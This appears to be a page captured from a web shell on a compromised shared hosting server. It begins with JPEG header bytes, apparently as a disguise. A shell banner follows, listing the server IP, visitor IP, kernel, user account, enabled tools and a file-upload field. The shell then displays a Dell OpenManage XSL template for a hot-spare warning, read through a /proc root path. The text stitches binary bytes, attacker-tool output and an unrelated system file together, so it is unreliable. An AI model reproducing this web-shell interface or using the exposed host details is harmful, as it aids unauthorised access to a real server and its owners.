����JFIF��x�x����'
| Server IP : 78.140.185.180 / Your IP : 216.73.216.28 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/3357889/root/opt/dell/srvadmin/var/lib/openmanage/xslroot/sm/template/common/ |
Upload File : |
<!-- This is the XSL to render the warning for assigning a global hot spare-->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<!-- Include some common templates created by SS -->
<xsl:include href="Utils.xsl"/>
<!--xsl:include href="vdtbl.xsl"/-->
<xsl:template match="OMA">
<DataArea backpagetarget="./DataArea?plugin=com.dell.sm.webplugins.ADInfoWebPlugin" printable="false" email="false" validate="true" Refresh="false" export="false" exportdata="false">
<xsl:attribute name="submit">./SubmitForm?plugin=com.dell.sm.webplugins.ADExecuteActionWebPlugin&HREF=<xsl:value-of select="HREF"/>&ControllerOID=<xsl:value-of select="ControllerOID"/>&ChannelOID=<xsl:value-of select="/OMA/ChannelOID"/>&EnclosureOID=<xsl:value-of select="/OMA/EnclosureOID"/>&ControllerName=<xsl:value-of select="/OMA/ControllerName"/>&ADiskOID=<xsl:value-of select="ADiskOID"/>&ADiskName=<xsl:value-of select="ADiskName"/>&FormFactor=<xsl:value-of select="FormFactor"/>&Action=16&Force=true&help=adprin</xsl:attribute>
<xsl:attribute name="submitdisplay"><xsl:value-of select="$strForce"/></xsl:attribute>
<xsl:attribute name="backpagedisplay"><xsl:value-of select="$strCancel"/></xsl:attribute>
<xsl:attribute name="backpagetarget">./DataArea?plugin=com.dell.sm.webplugins.ADInfoWebPlugin&HREF=<xsl:value-of select="HREF"/>&ControllerOID=<xsl:value-of select="ControllerOID"/>&ChannelOID=<xsl:value-of select="/OMA/ChannelOID"/>&EnclosureOID=<xsl:value-of select="/OMA/EnclosureOID"/>&ControllerName=<xsl:value-of select="/OMA/ControllerName"/>&ArrayDiskOID=<xsl:value-of select="ADiskOID"/>&ADiskName=<xsl:value-of select="ADiskName"/>&FormFactor=<xsl:value-of select="FormFactor"/>&help=adprin</xsl:attribute>
<AlertMessage alert="true" status='3'>
<xsl:attribute name="display"><xsl:value-of select="$strSubTitlePart1"/><xsl:value-of select="ADiskName"/><xsl:value-of select="$strSubTitlePart2"/></xsl:attribute>
</AlertMessage>
<script language="javascript">
function validate()
{
//using this function to turn off submit and back buttons.
disableButtons("submit","back" ,"");
return true;
}
</script>
</DataArea>
</xsl:template>
</xsl:stylesheet>